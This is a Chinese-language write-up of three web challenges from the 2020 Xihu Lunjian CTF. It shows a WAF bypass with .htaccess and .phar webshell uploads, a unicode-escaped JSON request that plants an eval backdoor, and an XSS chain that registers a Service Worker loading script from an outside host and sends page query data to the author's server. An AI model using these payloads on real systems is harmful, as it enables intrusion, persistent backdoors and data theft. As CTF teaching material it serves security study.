比赛

2020西湖论剑

西湖论剑

NewUpload

hint:
我装了宝塔 waf,apache 环境,自己本地配一套这种环境就知道怎么弄了。
看看宝塔自己装的 apache 有什么东西?

%00干掉宝塔waf

任意文件上传过滤php关键字
上传.htaccess绕过
普通的payload并不适用与php-fpm通信
/www/server/panel/vhost/apache下发现php的解析方式

1
2
3
4
#PHP
   <FilesMatch \.php$>
           SetHandler "proxy:unix:/tmp/php-cgi-74.sock|fcgi://localhost"
   </FilesMatch>

直接设置SetHandler "proxy:unix:/tmp/php-cgi-74.sock|fcgi://localhost",访问我们上传的后门并不行,查了下资料发现php-fpm有security.limit_extensions限制了php脚本的后缀名,它的默认值是: .php .phar

所以我们上传phar文件getshell,getshell后发现,我们需要readflag而,命令执行函数都被干掉了,php版本是php 7.4.10

1
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

https://github.com/Explorersss/exploits中的脚本试过一边后都不行

但是这里php-fpm服务是通过socket文件通信的,我们可以直接打php-fpm绕过disable function

https://gist.githubusercontent.com/Explorersss/452ba2ed228dee841ac474b5d96f1581/raw/dc35576e0a4448b33da381fd2980d586aedc4e01/bypass_disable_function_by_fpm.php

easyjson

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
include 'security.php';

if(!isset($_GET['source'])){
    show_source(__FILE__);
    die();
}
$sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'/';
var_dump($sandbox);
if(!file_exists($sandbox)){
    mkdir($sandbox);
    file_put_contents($sandbox."index.php","<?php echo 'Welcome To Dbapp OSS.';?>");
}
$action = $_GET['action'];
$content = file_get_contents("php://input");


if($action == "write" &&  SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
    $content = json_decode($content);
    $filename = $_GET['filename'];
    $filecontent = $content->content;
    $filename = $sandbox.$filename;
    file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}elseif($action == "reset"){
    $files = scandir($sandbox);
    foreach($files as $file) {
        if(!is_dir($file)){
            if($file !== "index.php"){
                unlink($sandbox.$file);
            }
        }
    }
}
else{
    die('Security Check Failed.');
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /?source=1&action=write&filename=index.php HTTP/1.1
Host: easyjson.xhlj.wetolink.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 439

{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u0070\u0068\u0070\u005f\u0076\u0061\u006c\u0075\u0065\u0020\u0061\u0075\u0074\u006f\u005f\u0070\u0072\u0065\u0070\u0065\u006e\u0064\u005f\u0066\u0069\u006c\u0065\u0020\u0022\u002e\u0068\u0074\u0061\u0063\u0063\u0065\u0073\u0073\u0022\u000a\u0023\u003c\u003f\u0070\u0068\u0070\u0020\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0031\u005d\u0029\u003b\u003f\u003e"}

flag{a5db5397505f825334aa4dfc17d3bb9f}

hardxss

在登入接口发现如下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
callback = "get_user_login_status";
		auto_reg_var();
		if(typeof(jump_url) == "undefined" || /^\//.test(jump_url)){
			jump_url = "/";
		}
		jsonp("https://auth.hardxss.xhlj.wetolink.com/api/loginStatus?callback=" + callback,function(result){
			if(result['status']){
				location.href = jump_url;
			}
		})
		function jsonp(url, success) {
		    var script = document.createElement("script");
		    if(url.indexOf("callback") < 0){
		    	var funName = 'callback_' + Date.now() + Math.random().toString().substr(2, 5);
		    	url = url + "?" + "callback=" + funName;
		    }else{
		    	var funName = callback;
		    }
		    window[funName] = function(data) {
		        success(data);
		        delete window[funName];
		        document.body.removeChild(script);
		    }
		    script.src = url;
		    document.body.appendChild(script);
		}
		function auto_reg_var(){
			var search = location.search.slice(1);
			var search_arr = search.split('&');
			for(var i = 0;i < search_arr.length; i++){
				[key,value] = search_arr[i].split("=");
				window[key] = value;
			}
		}

利用jsonp任意xss

view-source:https://xss.hardxss.xhlj.wetolink.com/login?callback=jsonp(%22//ffffuck.free.beeceptor.com/%22);

利用Service Workers从xss.hardxss.xhlj.wetolink.com移动到auth.hardxss.xhlj.wetolink.com

https://xss.hardxss.xhlj.wetolink.com/login?callback=jsonp(%22//abcde.free.beeceptor.com/2%22);//

2:

1
2
3
4
5
6
7
8
9
10
document.domain="hardxss.xhlj.wetolink.com";
a=document.createElement("iframe");
a.src="https://auth.hardxss.xhlj.wetolink.com";
document.body.append(a);
document.getElementsByTagName("iframe")[0].addEventListener("load",()=>{fuck()})
function fuck(){
    var code = `navigator.serviceWorker.register("/api/loginStatus?callback=self.importScripts('//serviceworker.free.beeceptor.com/exp.js');//")`;
    document.getElementsByTagName("iframe")[0].contentWindow.eval(code);
}

/:

1
2
3
self.addEventListener('fetch', function(event) {
  event.respondWith(new Response('<html><script>document.location.href="http://ccreater.top:60000/?"+document.location.search</script></html>',{headers: { 'Content-Type': 'text/html' }}));
});

image5725

image5832

详细说明见:http://blog.ccreater.top/2020/10/15/Service%20Worker/